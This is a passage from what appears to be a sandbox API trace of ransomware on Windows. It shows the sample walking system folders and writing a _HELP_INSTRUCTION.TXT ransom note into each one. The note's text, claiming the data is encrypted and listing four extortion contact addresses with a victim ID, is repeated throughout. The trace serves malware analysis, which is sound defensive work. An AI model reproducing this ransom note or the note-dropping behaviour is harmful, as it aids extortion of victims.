number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.427] CreateFileW (lpFileName="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.427] CreateFileW (lpFileName="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x374 [0032.427] WriteFile (in: hFile=0x374, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.428] CloseHandle (hObject=0x374) returned 1 [0032.428] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.428] PathFindFileNameW (pszPath="C:\\PerfLogs") returned="PerfLogs" [0032.428] lstrcpyW (in: lpString1=0x17e824, lpString2="PerfLogs" | out: lpString1="PerfLogs") returned="PerfLogs" [0032.428] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0032.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0032.428] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0032.428] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.428] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0032.428] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0032.428] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0032.428] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0032.428] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="Admin" | out: lpString1="C:\\PerfLogs\\Admin") returned="C:\\PerfLogs\\Admin" [0032.428] SetErrorMode (uMode=0x1) returned 0x1 [0032.429] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs\\Admin" | out: lpString1="C:\\PerfLogs\\Admin") returned="C:\\PerfLogs\\Admin" [0032.429] lstrcatW (in: lpString1="C:\\PerfLogs\\Admin", lpString2="\\" | out: lpString1="C:\\PerfLogs\\Admin\\") returned="C:\\PerfLogs\\Admin\\" [0032.429] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\PerfLogs\\Admin\\" | out: lpString1="C:\\PerfLogs\\Admin\\") returned="C:\\PerfLogs\\Admin\\" [0032.429] lstrcatW (in: lpString1="C:\\PerfLogs\\Admin\\", lpString2="*.*" | out: lpString1="C:\\PerfLogs\\Admin\\*.*") returned="C:\\PerfLogs\\Admin\\*.*" [0032.429] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3246b8 [0032.429] PathFindFileNameW (pszPath="C:\\PerfLogs\\Admin") returned="Admin" [0032.429] lstrcpyW (in: lpString1=0x17d784, lpString2="Admin" | out: lpString1="Admin") returned="Admin" [0032.429] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.429] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0032.429] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 1 [0032.429] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 0 [0032.429] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs\\Admin" | out: lpString1="C:\\PerfLogs\\Admin") returned="C:\\PerfLogs\\Admin" [0032.429] lstrcatW (in: lpString1="C:\\PerfLogs\\Admin", lpString2="\\*.*" | out: lpString1="C:\\PerfLogs\\Admin\\*.*") returned="C:\\PerfLogs\\Admin\\*.*" [0032.429] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="Desktop") returned 0x0 [0032.429] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="DESKTOP") returned 0x0 [0032.429] SetErrorMode (uMode=0x1) returned 0x1 [0032.429] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\PerfLogs\\Admin\\_HELP_INSTRUCTION.TXT") returned 39 [0032.429] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0032.430] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.430] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x37c) returned 0x0 [0032.430] RegQueryValueExW (in: hKey=0x37c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd81a8, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3dd81a8*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0032.430] RegCloseKey (hKey=0x37c) returned 0x0 [0032.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.430] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.430] CreateFileW (lpFileName="C:\\PerfLogs\\Admin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\admin\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.430] CreateFileW (lpFileName="C:\\PerfLogs\\Admin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\admin\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0032.430] WriteFile (in: hFile=0x37c, lpBuffer=0x17b57c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17b574, lpOverlapped=0x0 | out: lpBuffer=0x17b57c*, lpNumberOfBytesWritten=0x17b574*=0x2c4, lpOverlapped=0x0) returned 1 [0032.431] CloseHandle (hObject=0x37c) returned 1 [0032.431] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3246b8 [0032.431] PathFindFileNameW (pszPath="C:\\PerfLogs\\Admin") returned="Admin" [0032.431] lstrcpyW (in: lpString1=0x17d784, lpString2="Admin" | out: lpString1="Admin") returned="Admin" [0032.431] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0032.431] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0032.431] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.431] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0032.431] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.431] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0032.431] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 1 [0032.431] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 0 [0032.431] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.431] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0032.431] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.431] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 0 [0032.432] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.432] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0032.432] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0032.432] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.432] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.432] lstrcatW (in: lpString1="C:\\", lpString2="Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0032.432] SetErrorMode (uMode=0x1) returned 0x1 [0032.432] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0032.432] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0032.432] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Program Files\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0032.432] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*" [0032.432] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.432] PathFindFileNameW (pszPath="C:\\Program Files") returned="Program Files" [0032.432] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0032.432] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.432] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0032.432] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*" [0032.432] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="Desktop") returned 0x0 [0032.432] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="DESKTOP") returned 0x0 [0032.432] SetErrorMode (uMode=0x1) returned 0x1 [0032.432] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Program Files\\_HELP_INSTRUCTION.TXT") returned 38 [0032.432] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.433] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.433] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x380) returned 0x0 [0032.433] RegQueryValueExW (in: hKey=0x380, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd83d8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd83d8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.433] RegCloseKey (hKey=0x380) returned 0x0 [0032.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.433] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.433] CreateFileW (lpFileName="C:\\Program Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.433] CreateFileW (lpFileName="C:\\Program Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380 [0032.433] WriteFile (in: hFile=0x380, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.434] CloseHandle (hObject=0x380) returned 1 [0032.434] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.434] PathFindFileNameW (pszPath="C:\\Program Files") returned="Program Files" [0032.434] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0032.434] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.434] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.434] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0032.434] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0032.434] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.434] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.434] lstrcatW (in: lpString1="C:\\", lpString2="Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0032.434] SetErrorMode (uMode=0x1) returned 0x1 [0032.434] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0032.434] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0032.434] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Program Files (x86)\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0032.434] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*" [0032.434] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.434] PathFindFileNameW (pszPath="C:\\Program Files (x86)") returned="Program Files (x86)" [0032.434] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0032.435] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.435] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0032.435] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*" [0032.435] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="Desktop") returned 0x0 [0032.435] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="DESKTOP") returned 0x0 [0032.435] SetErrorMode (uMode=0x1) returned 0x1 [0032.435] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Program Files (x86)\\_HELP_INSTRUCTION.TXT") returned 44 [0032.435] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.435] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.435] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x380) returned 0x0 [0032.435] RegQueryValueExW (in: hKey=0x380, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd8608, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd8608*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.435] RegCloseKey (hKey=0x380) returned 0x0 [0032.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.435] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.435] CreateFileW (lpFileName="C:\\Program Files (x86)\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files (x86)\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.435] CreateFileW (lpFileName="C:\\Program Files (x86)\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files (x86)\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380 [0032.436] WriteFile (in: hFile=0x380, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.436] CloseHandle (hObject=0x380) returned 1 [0032.436] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.436] PathFindFileNameW (pszPath="C:\\Program Files (x86)") returned="Program Files (x86)" [0032.437] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0032.437] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.437] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.437] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0032.437] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0032.437] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.437] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.437] lstrcatW (in: lpString1="C:\\", lpString2="ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0032.437] SetErrorMode (uMode=0x1) returned 0x1 [0032.437] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0032.437] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0032.437] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\ProgramData\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0032.437] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*" [0032.437] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.437] PathFindFileNameW (pszPath="C:\\ProgramData") returned="ProgramData" [0032.437] lstrcpyW (in: lpString1=0x17e824, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0032.437] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.437] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0032.437] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*" [0032.437] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="Desktop") returned 0x0 [0032.437] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="DESKTOP") returned 0x0 [0032.437] SetErrorMode (uMode=0x1) returned 0x1 [0032.437] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\ProgramData\\_HELP_INSTRUCTION.TXT") returned 36 [0032.437] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.438] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.438] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x380) returned 0x0 [0032.438] RegQueryValueExW (in: hKey=0x380, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd8838, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd8838*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.438] RegCloseKey (hKey=0x380) returned 0x0 [0032.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.438] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.438] CreateFileW (lpFileName="C:\\ProgramData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\programdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.438] CreateFileW (lpFileName="C:\\ProgramData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\programdata\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380 [0032.438] WriteFile (in: hFile=0x380, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.439] CloseHandle (hObject=0x380) returned 1 [0032.439] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.439] PathFindFileNameW (pszPath="C:\\ProgramData") returned="ProgramData" [0032.439] lstrcpyW (in: lpString1=0x17e824, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0032.439] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.439] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.439] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0032.439] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0032.439] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.439] lstrcatW (in: 